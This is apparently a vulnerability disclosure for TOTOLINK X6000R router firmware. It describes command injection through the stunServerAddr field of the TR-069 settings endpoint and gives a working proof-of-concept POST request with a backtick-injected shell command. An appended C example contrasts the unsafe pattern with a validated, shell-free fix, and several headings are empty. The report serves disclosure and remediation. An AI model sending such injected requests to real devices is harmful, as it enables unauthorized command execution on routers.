version:

TOTOLINK X6000R-V9.4.0cu.852_B20230719

Vulnerability Introduction

Command Execution Vulnerability

Firmware download address

<https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/247/ids/36.html?_JS140.238.14.1=32a3b88fa917c478ff16813b06e93632b1699790448_184814390>

Vulnerability details

In the shttpd binary, the sub_4119A0 function obtains fields from the front end and passes them through the Uci_Set_Str function to the CsteSystem function, which hands the resulting string to a shell; because the field values are not sanitized, this creates a command execution vulnerability.

In httpd


In libcscommon.so

Uci_Set_Str:


CsteSystem:


Effect


POC

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.118.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 281
Origin: http://192.168.118.139
Connection: close
Referer: http://192.168.118.139/advance/tr069_cfg.html

{"addEffect":"0","enable":"1","url":"www.awa.com","user":"1","pass":"1","informEnable":"0","interval":"","requestUser":"","requestPass":"","stun_user":"","stun_pass":"","stunEnable":"0","stunServerAddr":"`ls > /here.txt`","stunPort":"","stunMaxAlive":"","stunMinAlive":"","topicurl":"setTr069Cfg"}
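The following is an added illustration, not code from the TOTOLINK firmware or from the report above. It shows the unsafe shape described in the vulnerability details (a request field such as stunServerAddr interpolated verbatim into a uci command string that is then run through a shell) next to a hardened version that validates the field as a hostname or IPv4 literal and invokes uci with an argument vector, so no shell ever parses the value. The function names, the uci key `tr069.stun.addr` and the command layout are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

/* Hypothetical reconstruction of the unsafe pattern: the caller later hands
 * this string to system(). Shell metacharacters in `value` (backticks, $(), ;)
 * are interpreted by the shell, which is the root cause described above.
 * Returns the length snprintf reports so the caller can see the value went in untouched. */
int unsafe_build_cmd(char *out, size_t outlen, const char *value) {
    return snprintf(out, outlen, "uci set tr069.stun.addr=%s", value);
}

/* Hardened input check: accept only characters legal in a hostname or
 * dotted-quad address (letters, digits, '.', '-'), with no leading or
 * trailing separator and an RFC 1123 length bound. Returns 1 if valid. */
int is_valid_host(const char *s) {
    size_t n = strlen(s);
    if (n == 0 || n > 253) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == '.' || c == '-')) return 0;
        if ((c == '.' || c == '-') && (i == 0 || i == n - 1)) return 0;
    }
    return 1;
}

/* Hardened setter: rejects invalid values and runs uci via execlp with a
 * fixed argv, bypassing the shell entirely. Returns the child's exit status,
 * or -1 on validation failure or a process error. */
int safe_uci_set(const char *key, const char *value) {
    if (!is_valid_host(value)) return -1;
    char kv[512];
    if (snprintf(kv, sizeof kv, "%s=%s", key, value) >= (int)sizeof kv) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execlp("uci", "uci", "set", kv, (char *)NULL);
        _exit(127);  /* exec failed; 127 mirrors the shell's "not found" */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```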